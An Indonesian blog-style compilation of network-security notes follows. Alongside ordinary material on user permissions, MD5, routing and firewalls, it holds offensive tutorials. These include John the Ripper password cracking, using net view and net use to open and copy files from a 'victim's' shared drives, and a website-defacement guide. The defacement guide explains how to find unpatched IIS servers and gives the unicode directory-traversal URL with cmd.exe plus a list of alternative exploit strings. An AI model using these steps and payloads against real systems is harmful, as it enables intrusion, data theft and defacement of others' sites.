Tools Untuk Keamanan Jaringan

a. Brute Force 

snmp brute force attacker

Brute Force adalah salah  satu  cara  yang digunakan cracker untuk menebak kata  kunci (password)  tertentu. Prosesnya  dilakukan dengan  cara menebak  secara  urutan  sebuah  kombinasi  password  mulai  dari  kombinasi angka 0 sampai , A sampai Z, dan seterusnya pada setiap digit kata kunci.

Sebuah   kata   kunci  yang  berhasil   ditebak dengan  teknik Brute Force mengakibatkan  akses  ilegal  terhadap sebuah akun.  Jika  yang berhasil  ditebak  adalan  akun administrator  (petinggi  dalam  sebuah sistem),  maka bukan tidak mungkin sistem tersebut akan berpindah tangan (take over).
Brute Force adalah teknik menembus sistem yang paling populer dan bsia digunakan di hampir semua sistem yang menggunakan sistem otentikasi berbasis kata kunci. Tools bisa di download disini : http://www.secure-bytes.com/SNMP+Brute+Force+Attacker.php

b. Generate Password

PassworG adalah software password generator yang bersifat freeware, yang memungkinkan Anda untuk membuat sejumlah password yang akan di test tingkat keamanannya, password akan diacak,bersifat  unik dan sangat aman password yang sangat sulit untuk dipecahkan atau ditebak. Tools bisa didownload

c. Cek Kekuatan Password

Kekuatan password sangat penting bagi keamanan akun yang kita pakai, untuk mengetahui berapa kuat password yang kita pakai kita bisa buka alamat sebagai berikut  http://www.passwordmeter.com/

D. Hack Password

PasswordFox merupakan alat pemulihan sandi kecil yang memungkinkan Anda untuk melihat nama pengguna dan password disimpan oleh Web browser Mozilla Firefox. Tools bisa didownload

Cara Add User dan Group dan Hak Akses di Linux

Semua user adalah anggota dari satu atau lebih group. Defaultnya, user baru menjadi anggota sebuah private group dengan nama yang sama dengan user (misalnya, account yang dibuat untuk user dwulansari adalah anggota dari private group yang juga bernama dwulansari).
Kali ini kita akan menambahkan user account di Linux melalui Kernel atau GUI ( Graphics User Interface ).
Berikut cara menambahkan user account di Linux :
1. Pilih Menu System>>Administration>>User and Group
2. Klik Add User untuk menambahkan user account baru

3. Masukan user name, full name dan password baru kemudian klik OK

4. Buka terminal>>aktifkan user yang dibuat dengan perintah su namauser

Kita juga bisa membuat user account melalui CLI (Comand Line Interface).
Cara menambahkan user account melalui CLI adalah :
1. Klik kanan pada desktop>>open terminal
2. Login sebagai root

$su –l

3. Setelah masuk ke root, kemudian ketikan perintah dibawah untuk membuat user baru

#adduser namauser

4. Kita juga bisa menambahakan password di user account yang baru dengan perintah

#passwd namauser

5. Untuk masuk ke user account perintahnya adalah

#su namauser

-Mengatur Hak Aksesnya

Hak akses mengatur ’siapa’ berhak mengakses ‘apa’ saja dan ‘bagaimana’ ia dapat mengaksesnya. Di dunia GNU/linux, dikenal tiga jenis hak akses yang biasa disingkat dengan r-w-x. Huruf r merupakan kependekan dari read (sama dengan read-only di dunia microsoft windows), w merupakan kependekan dari write, dan x merupakan kependekan dari execute. Sesuai namanya, file/folder yang memiliki atribut read maka selain Sang Pemilik (owner) file dan Super User (root), tidak bisa memodifikasi (melakukan write) file/folder yang bersangkutan. Lho, kok root bisa memodifikasi (write) file yang atributnya read? Ya, karena root memiliki ‘kuasa’ tertinggi di GNU/Linux dan bahkan bisa melakukan apa saja, temasuk menghancurkan sistem yang ada. Jadi, hati-hati kalau menggunakan user root!

Lalu apa bedanya x dan r? Keduanya sama-sama dikatan memiliki hak akses melihat saja. Hanya saja, kalau r biasanya digunakan untuk file/folder yang bisa ‘dilihat isinya’ seperti .odt, .doc, .txt, .jpeg, .pdf, .png, dan lain-lain sedangkan x sesuai namanya, digunakan untuk file-file yang bisa dieksekusi (.exe kalau di dunia microsoft windows).

Bagaimana cara memberikan atribut r, w, atau x pada suatu file/folder? Mudah saja. Pastikan Anda memiliki user name dan password untuk login ke sistem GNU/Linux. Kemudian ikuti langkah-langkah berikut ini:

  1. Setelah login, bukalah file manager yang ada di Linux Anda (bisa Konqueror, Dolphin, atau Nautilus)! Pada contoh kali ini akan saya gunakan Konqueror.

  2. Masuk ke folder /home/user-name-anda

  3. Buat suatu folder baru atau gunakan yang sudah ada.

  4. Klik kanan folder yang ada dan pilih Properties.

  5. Pada kotak dialog yang terbuka, pilih tab Permissions.

  6. Ada tiga pilihan Access Permissons yang bisa Anda atur di sini. Ada hak akses untuk Owner (Sang Pemilik file), Group (user yang satu group dengan owner), dan Others (user lain yang tak satu group dengan owner).

  7. Perlu diperhatikan bahwa hak akses di sini tak tertera secara gamblang sebagai r-w-x tapi dengan kata lain yang mewakilinya. Untuk hak akses read dan execute diwakili dengan Can View Content, untuk write diwakili dengan Can View and Modify Content. Kalau Anda ingin agar user lain tak bisa mengakses folder tersebut maka beri saja atribut Forbidden pada pilihan Group dan Others.

  8. Anda juga bisa memberi tanda centang di samping tulisan Only owner can rename and delete folder content untuk mencegah pihak lain yang ingin mengganti nama folder dan atau menghapus isi folder yang Anda miliki. Hal ini perlu Anda lakukan ketika Anda berada di suatu network dan Anda memberikan atribut write pada folder yang Anda share.

  9. Anda juga bisa menentukan user yang tergabung dalam group mana saja yang bisa mengakses folder yang Anda buat tadi dengan memilih dari menu drop down di bawah tulisan Ownership.

  10. Terakhir klik OK untuk melakukan konfirmasi.

  11. Untuk melihat perubahan yang telah Anda buat tadi, ulangi langkah 1 sampai 5. Kemudian klik pada menu Advanced Pemissions.

  12. Akan Anda lihat atribut folder dalam mode r-w-x. Dari kotak dialog ini pun Anda juga bisa mengubah hak akses dari folder yang Anda buat.

  13. Untuk yang ini, caranya lebih simpel karena Anda tinggal klak klik untuk menentukan hak akses di bawah menu yang sesuai.

  14. Kalau Anda telah mengubah lagi atributnya, maka jangan lupa klik OK untuk konfirmasi.

Cara Add User dan Group dan Hak Akses di Windows XP

Membuat User Pengguna, agar kita lebih aman dalam berkomputer. Nah dalam Windows dikenal ada 2 jenis user. User yang pertama yaitu Administrator dan yang kedua yaitu User/Guest. Nah jika kita masuk sebagai Administrator maka kita bisa leluasa mengutakj atik komputer kita, jika kita masuk sebagai user kita cuma bisa melihat isi data di komputer kita dan tidak bisa menginstall apa – apa. Nah sekarang saya akan memberikan caranya agar kita bisa membuatnya.

  • Masuk Start, lalu klik kanan My Computer.  Setelah itu akan muncul pilihan, Dan anda pilih dan klik Manage.
  • Dan akan muncul kotak yang berisi informasi seperti dibawah ini, Lalu anda pilih Local User And Groups. Lalu klik tulisan User pada root sebelah kiri
  • 3win

4win

  • Lalu klik kanan pada root yang ada informasi user, lalu klik New User. Dan muncul tampilan lagi, Nah disitu tulis nama sesuai keinginan anda, misalnya saya memberi namanya Admin1
  • Setelah itu isi password yang anda inginkan, jadi jika kita memberi password maka orang lain yang tidak tahu password kita, dia tidak akan bisa masuk ke komuputer kita. Lalu pada bagian bawahnya centang pilihan Password Never Expires.
  • Lalu klik Create. Sekarang kita akan mensetting bagaimana user yang kita buat tadi bisa masuk menjadi anggota Adminstartor. Klik 2 kali user yang telah kita buat tadi., setelah itu akan muncul tampilan seperti dibawah ini.
  • Nah informasi dari tabel diatas adalah mengetahui informasi yang telah kita buat, sekarang anda pilih pada Tab Member Of, lalu akan muncul kita sebagai anggota User, Nah sekarang anda pilih dan klik ADD.
  • Lalu anda Klik Menu pilihan Advance.
  • Nah akan muncul tampilan menu lagi, sekarang anda pilih dan klik Find Now.
  • Setelah anda pilih Find Now, akan mucul pilihan User dibawah Menu Find Now. Didalam Menu itu terdapat banyak user yang ada pada komputer anda, jika anda ingin membuat User sebagai Administrator, maka anda pilih Administrator, Administrator sendiri adalah yang mempunyai Hak penuh atas segala yang ada pada Windows kita, Jika anda pilih User maka akan dibatasi hak kita. Nah disini saya memberi Usernya adalah Administrator.
  • Lalu klik OK.

Mengatur Hak Akses

Untuk mengatur hak akses file atau folder yang di-share terhadap user atau group tertentu. Untuk melakukan hal ini, Anda harus terlebih dahulu me­ngu­bah standar konfigurasinya.


Untuk mengubah konfigurasinya, Anda dapat mengikuti langkah berikut ini: 

1. Masuk ke dalam window Control Panel lalu klik “Folder Options”. Selanjutnya, Windows XP akan menampilkan window Folder Options.

2. Pilih tab “View” lalu cari option “Use simple file sharing (Recommended) yang dapat Anda temukan di bawah area “Advanced set ting”.

3. Hilangkan tanda centang yang terdapat dalam boks option “Use simple file sharing”. Selanjutnya, Anda dapat menutup langkah ini dengan mengklik tombol “OK” dan “Apply”.

Selanjutnya, untuk menetapkan hak akses file atau folder yang di-share, Anda dapat mengaturnya dengan cara berikut: 

1. Jelajahi file atau folder yang telah di-share melalui Windows Explorer. 

2. Klik kanan file atau folder tersebut lalu pilih menu konteks “Properties”. 

3. Selanjutnya, melalui window yang ditampilkan, pilih tab “Security” dan di sana Anda dapat menentukan hak akses terhadap file atau folder yang telah di-share. Yang perlu diperhatikan, langkah ini hanya dapat dilakukan pada hard disk yang diformat menggunakan sistem NTFS dan Anda harus menjadi pemilik utama file atau folder yang di-share.

Enkripsi MD5

Dalam Kriptografi (ilmu dan seni untuk menjaga kerahasiaan berita), MD5 yang merupakan singkatan dari Message-Digest algortihm 5, adalah fungsi hash (prosedur terdefinisi atau fungsi matematika yang mengubah variabel dari suatu data yang berukuran besar menjadi lebih sederhana) kriptografik yang digunakan secara luas dengan hash value 128-bit. MD5 dimanfaatkan dalam berbagai aplikasi keamanan, dan umumnya digunakan untuk meguji integritas sebuah file.

Algoritma MD5

Hash-hash MD5 sepanjang 128-bit (16-byte), yang dikenal juga sebagai ringkasan pesan, secara tipikal ditampilkan dalam bilangan heksadesimal 32-digit. Berikut ini merupakan contoh pesan ASCII sepanjang 43-byte sebagai masukan dan hash MD5 terkait:

MD5(“The quick brown fox jumps over the lazy dog”) = 9e107d9d372bb6826bd81d3542a419d6

Bahkan perubahan yang kecil pada pesan akan (dengan probabilitas lebih) menghasilkan hash yang benar-benar berbeda, misalnya pada kata “dog”, huruf d diganti menjadi c:

MD5(“The quick brown fox jumps over the lazy cog”) = 1055d3e698d289f2af8663725127bd4b

Hash dari panjang-nol ialah:

MD5(“”) = d41d8cd98f00b204e9800998ecf8427e

Sajian lengkap mengenai algoritma enkripsi MD5 dapat Anda simak di sinihttp://id.wikipedia.org/wiki/MD5

sumber : id.wikipedia.org

MD5 Tool (MD5 Converter)

Untuk melakukan konversi secara instan, telah banyak disediakan tool-tool di internet baik berupa aplikasi dekstop, maupun aplikasi berbasis web, untuk melakukan konversi dari plain (teks terang) ke enkripsi MD5 maupun sebaliknya (atau lebih dikenal dengan istilah MD5 Reverse). Seperti halnya dari situs http://md5.gromweb.com dan beberapa situs serupa.

MD5 Checksum

MD5 Checksum Verifier Software

Sedangkan untuk aplikasi pengujian integritas sebuah file atau lebih dikenal dengan istilah MD5 Checksum, dapat menggunakan aplikasi desktop atau aplikasi berbasis web MD5 Checksum seperti“MD5 Checksum Verifier”(dapat diunduh di sini) dan sebagainya. Software semacam ini akan menghasilkan kode MD5 dari file yang diuji integritasnya. Selanjutnya kode MD5 ini akan digunakan untuk menguji apakah file tersebut memiliki integritas ataukah tidak. Artinya jika file akan diberikan atau dikirimkan atau diunduh, si penerima dapat mencocokkan dengan yang diterima apakah ukuran, struktur, dan jenis file sesuai dengan yang diberikan oleh si pembuat file. Contohnya jika Anda men-download sebuah file, kemudian diberikan juga kode MD5 Checksum-nya, jika diperiksa (divalidasi) dengan tool seperti MD5 Checksum Verifier, dinyatakan valid atau sama dengan file yang diuji, maka dikatakan file tersebut tak mengalami perubahan dari pengirim hingga ke tangan Anda. (perubahan bisa terjadi karena virus dan sebagainya)

Pengujian semacam ini ditujukan untuk memastikan suatu file tidak disisipi atau corrupt (hilangnya sebagian) atau mungkin terinveksi, baik itu karena virus, malware, atau injeksi software berbahaya lainnya.

Aplikasi John The Ripper

John the Ripper adalah suatu program yang lumayan terkenal di dunia hacking. JTR biasa digunakan untuk meng-Crack suatu password yang cepat, saat ini tersedia untuk Unix ,Windows, DOS, BeOS, dan OpenVMS. Tujuan utamanya adalah untuk mendeteksi password Unix lemah.

instalasi John the Ripper pada windows dan saya akan membahas beberapa tipe dasar serangan dan hal-hal yang dapat Anda lakukan dengan John the Ripper. Artikel ini akan cukup panjang dan saya coba menjelaskan dengan bahasa ala kadarnya yang saya harap dapat dimengerti.

Sekarang mari kita mulai tutorial

– Download John the Ripper 1.7.0.1 (Windows – binaries, ZIP, 1360 KB) klik DISINI : www.mediafire.com/?u47xbiv6n7i3pps

Beberapa tips yg akan mempermudah saat menginstal John the Ripper pada windows

1. Simpan di C:/ , jangan di program files maupun folder apapun.
2. Ketika menginstal mungkin akan terlihat seperti C: / John/john1701 / dll Pindahkan semuanya keluar dari folder john1701 dan masuk ke folder pertama. Kemudian hapus john1701.
3. Sekarang ketika Anda masuk ke drive C anda dan membuka folder john, Anda akan melihat kedua folder doc untuk menjalankan, bukan john1701
4. Dalam run folder Anda akan melihat aplikasi “john-386″ atau “john-sesuatu”. Hanya ganti nama ke “john”

Untuk menjalankan JTP, kita membukanya melalui garis perintah ms-dos
Go Start, run, dan ketik cmd
ketikkan perintah ini: cd C: / john / run

Sekarang kita masuk ke bebrapa jenis attack melalui JTP.

-Bruteforce Attack-
Pertama saya akan menunjukkan modus JTP bruteforcing. mode ini adalah mencoba setiap kombinasi yang memungkinkan dari huruf (baik besar dan huruf kecil), angka, simbol atau kombinasi dari tiga sampai menemukan password. Sebelum saya memberitahu Anda bagaimana untuk melakukannya, kita harus mengambil hash (Saya akan menggunakan bentuk: CRjRYEn9g3PUc dari atas), menyalin dan masa di notepad, dan simpan di direktori “run” dalam John the Ripper sebagai file txt. Saya menyebutnya hash.txt. Salah satu cara untuk melakukan serangan jenis ini adalah untuk ketik “hash.txt john” (semua perintah tanpa tanda kutip) dan tekan enter. Ini akan mulai mencoba bruteforce password. Cara lain adalah dengan drag file hash.txt dan drop pada aplikasi john (ini akan dilakukan di folder run). Kekurangan dari bruteforce attack adalah memerlukan waktu yang sangat lama, tapi proses bisa dihentikan dengan mengetik perintah “ctrl + C”.

-Bruteforce Attack with conditions-
Cara ini lebih singkat. Jadi jika Anda berpikir password hanya berisi huruf Anda dapat menggunakan perintah “john-i: alpha hash.txt”, jika Anda berpikir password hanya berisi angka yang Anda dapat menggunakan perintah “john-i: hash.txt digit”, Anda juga dapat menggunakan perintah “john-i: semua hash.txt” untuk menebak password yang menggunakan kedua huruf dan angka.

-Dictionary Attack-
Cara ini dilakukan saat kita berhadapan dengan password cengan kombinasi yang panjang. tetapi metode ini lebih cepat dibandingkan apabila kita menggunakan bruteforce attack, tetapi membutuhkan ketelitian, karena kita perlu membuat daftar kata (sesuai kamus) dan jtp akan mencocokan setiap huruf yang sesuai dengan daftar yang telah kita buat.
Untuk contoh ini daftar kata saya sebut “wordlist.txt”.
Untuk melakukan Dictionary Attac, ketik perintah ini: john-w: hash.txt wordlist.txt

Ketika cracking password telah dilakukan,kita dapat memeriksanya dengan menggunakan perintah engan menggunakan perintah “hash.txt john-show”

masih banyak lagi kegunaan software ini, cukup sekian tutor dari saya,, semoga bermanfaat.

Sumber :    http://nandadilala.wordpress.com/2011/05/27/cara-menginstal-john-the-ripper-di-windows-untuk-mencuri-password/

Kegunaan Net View, Net Use, dan Net User

Menggunakan Perintah  Net View Pada Cmd

Net view digunakan untuk Melihat computer yang sedang aktif dan terhubung dengan LAN.

Pada command prompt menggunakan perintah “net view” (ATAU ANDA JUGA BISA GUNAKAN “Scanner NB” OPSI DALAM ” ALAT IP “PERANGKAT LUNAK DENGAN MEMASUKI JARAK WAKTU ALAMAT  IP. INI DENGAN METODE ANDA BISA SCAN JUMLAH KOMPUTER ORANG).

Contoh: C:> net view \ \ \ 219.64.55.112

Di atas adalah contoh untuk operasi dengan menggunakan command prompt. “net view”. “Net view” adalah salah satu dari perintah netbios untuk melihat sumber daya  dari komputer yang jauh. Di sini “219.64.55.112″ adalah alamat IP komputer remote yang akan hacked melalui netbios. Anda harus mengganti alamat IP yang asli di  tempat itu. Jika berhasil daftar HARD-DISK DRIVE & printer yang akan ditampilkan. Jika tidak pesan kesalahan ditampilkan. Jadi ulangi prosedur 2 dengan alamat IP yang berbeda.

Menggunakan perintah Net Use

Setelah berhasil, gunakan “net use” perintah pada command prompt. perintah lain yang memungkinkan untuk hack drive remote atau printer.

Contoh-1:
C: \ net use> D: \ \ 219.64.55.112 \ F
Contoh-2:
C:\>net use G: \\219.64.55.112\SharedDocs

Contoh-3:
C:\>net use I: \\219.64.55.112\Myprint

CATATAN: Dalam Contoh 1,2 & 3, D:, G: & I: adalah Network Drive Nama yang akan dibuat pada komputer Anda untuk mengakses’s komputer remote hard-disk.

CATATAN: BERIKAN NAMA DRIVE YANG TIDAK DIGUNAKAN OLEH SETIAP DRIVE LAIN TERMASUK-DISK DRIVE HARD, DRIVE FLOPPY DRIVE DAN-ROM PADA KOMPUTER ANDA. ITU ADALAH, JIKA ANDA MEMILIKI C: & D: AS DIRVES HARD, A: SEBAGAI DIVE FLOPPY DAN E: SEBAGAI CD-DRIVE, BERIKAN F: SEBAGAI DRIVE BERSAMA ANDA DI ATAS COMMAND PROMPT

F:, “SharedDocs” adalah nama dari hard drive komputer remote-disk yang ingin Anda hack. “Myprint” adalah nama printer komputer remote. Ini adalah ditampilkan setelah memberi “net use” perintah. “219.64.55.112″ adalah alamat IP dari komputer remote yang ingin Anda hack.

4. 4. Setelah berhasil komputer Anda akan memberikan pesan bahwa “Perintah selesai dengan sukses”. Setelah Anda mendapatkan pesan di atas Anda hanya satu langkah menjauh dari hacking komputer.

Sekarang buka “My Computer” Anda akan melihat sebuah “Hard-Disk drive” baru (Shared) dengan nama tertentu. Anda dapat membuka dan mengakses komputer remote Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. Anda dapat menyalin file, musik, dll folder dari hard drive-korban. Anda dapat menghapus / memodifikasi data pada hard-drive korban hanya jika MENULIS-ACCESS diaktifkan pada itu sistem korban. You can access files/folders quickly through “Command Prompt”. Anda dapat mengakses file / folder dengan cepat melalui “Command Prompt”.

CATATAN: Jika Komputer Firewall Remote Diaktifkan Komputer Anda Tidak Akan Sukses Dalam Mendapatkan Akses Untuk Komputer Melalui Remote NetBIOS. Itulah yang terjadi Dalam Situasi ini. (Sebuah Pesan Kesalahan yang di Tampilkan). Jadi Ulangi Prosedur 2,3 Dengan IP Address yang berbeda.
Kegunaan Net User
Fungsi dari Net User adalah untuk menambah user account atau menampilkan informasi tentang user account/account pengguna.Untuk menampilkan atau melihat user account yang ada pada komputer caranya ketik :
net user pada cmd maka tampilan seperti gambar dibawah ini :

Serperti yang terlihat pada gambar di atas terdapat dua user account yaitu Administrator dan Guest.
Untuk menambah user account caranya ketik perintah net user diikuti dengan mengetikkan nama_user diikuti dengan menambahkan /add. contohnya misalkan kita akan menambah user account dengan nama user TEST maka perintahnya sebagai berikut :
net user TEST /add
setelah diketik perintah di atas maka user account yang ditambah tidak punya password, tetapi jika anda ingin mempassword user yang ditambah maka caranya tinggal menambahkan tanda bintang (*) setelah nama_user, nama user di sini adalah TEST. Caranya seperti ini :
net user TEST * /add

Apabila terlihat seperti gambar di atas maka proses penambahan user baru sudah berhasil. Sekarang coba anda Log Of komputer anda atau restart, maka di layar screen logon akan tampil seperti gambar di bawah ini :

Sedangkan untuk mendelete user caranya tinggal anda tambahkan saja perintah /delete setelah nama_user. Perintahnya seperti ini:
net user TEST /delete

Untuk melihat informasi tentang user caranya ketik net user [namauser]. Contoh kita akan melihat informasi tentang user Administrator, maka perintahnya sebagai berikut:
net user Administrator lalu tekan ENTER maka akan terlihat seperti gambar :

Pengertian routing, Fungsi & Jenisnya

Routing adalah proses dimana suatu item dapat sampai ke tujuan dari satu lokasi ke lokasi lain. Beberapa contoh item yang dapat di-routing : mail, telepon call, dan data. Di dalam jaringan, Router adalah perangkat yang digunakan untuk melakukan routing trafik.

Konsep dasar routing
Bahwa dalam jaringan WAN kita sering mengenal yang namanya TCP/IP (Transmission Control Protocol/ Internet Protocol) sebagai alamat sehingga pengiriman paket data dapat sampai ke alamat yang dituju (host tujuan). TCP/IP membagi tugas masing-masingmulai dari penerimaan paket data sampai pengiriman paket data dalam sistem sehingga jika terjadi permasalahan dalam pengiriman paket data dapat dipecahkan dengan baik. Berdasarkan pengiriman paket data routing dibedakan menjadi routing lansung dan routing tidak langsung.

  • Routing langsung merupakan sebuah pengalamatan secara langsung menuju alamat tujuan tanpa melalui host lain. Contoh: sebuah komputer dengan alamat 192.168.1.2 mengirimkan data ke komputer dengan alamat 192.168.1.3
  • Routing tidak langsung merupakan sebuah pengalamatan yang harus melalui alamat host lain sebelum menuju alamat hort tujuan. (contoh: komputer dengan alamat 192.168.1.2 mengirim data ke komputer dengan alamat 192.1681.3, akan tetapi sebelum menuju ke komputer dengan alamat 192.168.1.3, data dikirim terlebih dahulu melalui host dengan alamat 192.168.1.5 kemudian dilanjutkan ke alamat host tujuan.

Jenis Konfigurasi Routing

  1. Minimal Routing merupakan proses routing sederhana dan biasanya hanya pemakaian lokal saja.
  2. Static Routing, dibangun pada jaringan yang memiliki banyak gateway. jenis ini hanya memungkinkan untuk jaringan kecil dan stabil.
  3. Dinamic Routing, biasanya digunakan pada jaringan yang memiliki lebih dari satu rute. Dinamic routing memerlukan routing protocol untuk membuat tabel routing yang dapat memakan resource komputer.

Router atau perangkat-perangkat lain yang dapat melakukan fungsi routing, membutuhkan informasi sebagai berikut :

* Alamat Tujuan/Destination Address – Tujuan atau alamat item yang akan dirouting
* Mengenal sumber informasi – Dari mana sumber (router lain) yang dapat dipelajari oleh router dan memberikan jalur sampai ke tujuan.
* Menemukan rute – Rute atau jalur mana yang mungkin diambil sampai ke tujuan.
* Pemilihan rute – Rute yang terbaik yang diambil untuk sampai ke tujuan.
* Menjaga informasi routing – Suatu cara untuk menjaga jalur sampai ke tujuan yang sudah diketahui dan paling sering dilalui.

Tabel Routing

Sebuah router mempelajari informasi routing dari mana sumber dan tujuannya yang kemudian ditempatkan pada tabel routing. Router akan berpatokan pada tabel ini, untuk memberitahu port yang akan digunakan untuk meneruskan paket ke alamat tujuan.

Jika jaringan tujuan, terhubung langsung (directly connected) di router, Router sudah langsung mengetahui port yang harus digunakan untuk meneruskan paket.

Jika jaringan tujuan tidak terhubung langsung di badan router, Router harus mempelajari rute terbaik yang akan digunakan untuk meneruskan paket. Informasi ini dapat dipelajari dengan cara :

1. Manual oleh “network administrator”
2. Pengumpulan informasi melalui proses dinamik dalam jaringan.

Mengenal Rute Statik dan Dinamik

Ada dua cara untuk memberitahu router bagaimana cara meneruskan paket ke jaringan yang tidak terhubung langsung (not directly connected) di badan router.

Dua metode untuk mempelajari rute melalui jaringan adalah :

Rute Statik – Rute yang dipelajari oleh router ketika seorang administrator membentuk rute secara manual. Administrator harus memperbarui atau mengupdate  rute statik ini secara manual ketika terjadi perubahan topologi antar jaringan (internetwork).
Rute Dinamik – Rute secara Dinamik dipelajari oleh router setelah seorang administrator mengkonfigurasi sebuah protokol routing yang membantu menentukan rute. Tidak seperti rute Statik, pada rute Dinamik, sekali seorang administrator jaringan mengaktifkan rute Dinamik, maka rute akan diketahui dan diupdate secara otomatis oleh sebuah proses routing ketika terjadi perubahan topologi jaringan yang diterima dari “internetwork” .

Pengertian dan Fungsi Firewall

Pengertian  / Arti Firewall, Firewall adalah sebuah sistem atau perangkat yang mengizinkan lalu lintas jaringan yang dianggap aman untuk melaluinya dan mencegah lalu lintas jaringan yang tidak aman. Umumnya, sebuah firewall diimplementasikan dalam sebuah mesin terdedikasi, yang berjalan pada pintu gerbang (gateway) antara jaringan lokal dan jaringan lainnya.

Firewall umumnya juga digunakan untuk mengontrol akses terhadap siapa saja yang memiliki akses terhadap jaringan pribadi dari pihak luar. Saat ini, istilah firewall menjadi istilah generik yang merujuk pada sistem yang mengatur komunikasi antar dua jaringan yang berbeda. www.cyberkomputer.com

Mengingat saat ini banyak perusahaan yang memiliki akses ke Internet dan juga tentu saja jaringan korporat di dalamnya, maka perlindungan terhadap aset digital perusahaan tersebut dari serangan para hacker, pelaku spionase, ataupun pencuri data lainnya, menjadi esensial.” Jadi firewall adalah suatu mekanisme untuk melindungi keamanan jaringan komputer dengan menyaring paket data yang keluar dan masuk di jaringan. Paket data yang “baik” diperbolehkan untuk melewati jaringan dan paket dapa yang dianggap “jahat” tidak diperbolehkan melewati jaringan www.cyberkomputer.com .

Kunci ruangan tersebut hanya dipegang oleh staf IT dan diperbolehkan menggunakan ruang tersebut atas seizin staf IT. Ini berfungsi selain menjaga kehilangan alat komputer dan jaringan secara fisik oleh pencuri atau perampokan, namun juga berfungsi menjaga kehilangan data yang tersimpan pada alat komputer tersebut. Bisa saja seseorang mencuri dan menghapus data penting perusahaan. Tentunya ini sangat merugikan perusahaan tersebut.

Berikut ini ilustrasi mengenai firewall ;

2. Fungsi Firewall

A. Mengontrol dan mengawasi paket data yang mengalir di jaringan Firewall harus dapat mengatur, memfilter dan mengontrol lalu lintas data yang diizin untuk mengakses jaringan privat yang dilindungi firewall. Firewall harus dapat melakukan pemeriksaan terhadap paket data yang akan melawati jaringan privat. Beberapa kriteria yang dilakukan firewall apakah memperbolehkan paket data lewati atau tidak, antara lain :

  1. Alamat IP dari komputer sumber. www.cyberkomputer.com
  2. Port TCP/UDP sumber dari sumber.
  3. Alamat IP dari komputer tujuan.
  4. Port TCP/UDP tujuan data pada komputer tujuan
  5. Informasi dari header yang disimpan dalam paket data.

B. Melakukan autentifikasi terhadap akses. www.cyberkomputer.com

C. Aplikasi proxy Firewall mampu memeriksa lebih dari sekedar header dari paket data, kemampuan ini menuntut firewall untuk mampu mendeteksi protokol aplikasi tertentu yang spesifikasi.

D. Mencatat setiap transaksi kejadian yang terjadi di firewall. Ini Memungkinkan membantu sebagai pendeteksian dini akan penjebolan jaringan.

Penjelasan Deface

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo anda adalah web master dan anda ngerubah tampilan halaman situs yang anda punya tentu saja itu nggak bisa disebut deface….
Proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan “unicode bug”. Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser. Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll) key nya terserah, lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0 , kita scan terlebih dahulu di http://www.netcraft.com.setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ,langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengetahui cara scan lewat mirc ,coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/…. or memakai cara manual yg lebih sering kita gunakan:

http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Pertama : Muncul pesan ERROR
Kedua : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka http://www.targethost.com tadi ada kemungkinan untuk bisa kita deface…
Mari kita perhatikan URL diatas. URL diatas akan dibagi menjadi empat bagian yaitu :
• Bagian host, yaitu “http://www.targethost.com”
• Bagian exploit string, yaitu “/scripts/..%255c..%255c”
• Bagian folder, yaitu “/winnt/system32/”
• Bagian command, yaitu “cmd.exe?/c+dir+c:\”
Kita lihat pada bagian command diatas menunjukkan perintah “dir c:\” yang berarti melihat seluruh file-file yang berada pada root drive C. Anda bisa mencoba perintah yang lain seperti “dir d:\” atau yang lain. Ingat, anda harus mengganti karakter spasi dengan tanda “+”. Anda bahkan bisa mengetahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah “ipconfig.exe /all”
Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser anda. Untuk itu anda ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :
– /cgi-bin/..%255c..%255c
– /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
– /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
– /scripts/..%255c..%255c
Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser anda maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE anda yg lagi ddos). Dan anda bisa memilih situs lain sebagai sasaran. Lanjut seandainya udah dapet site yg bug unicodenyahgak di patch.. Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot.
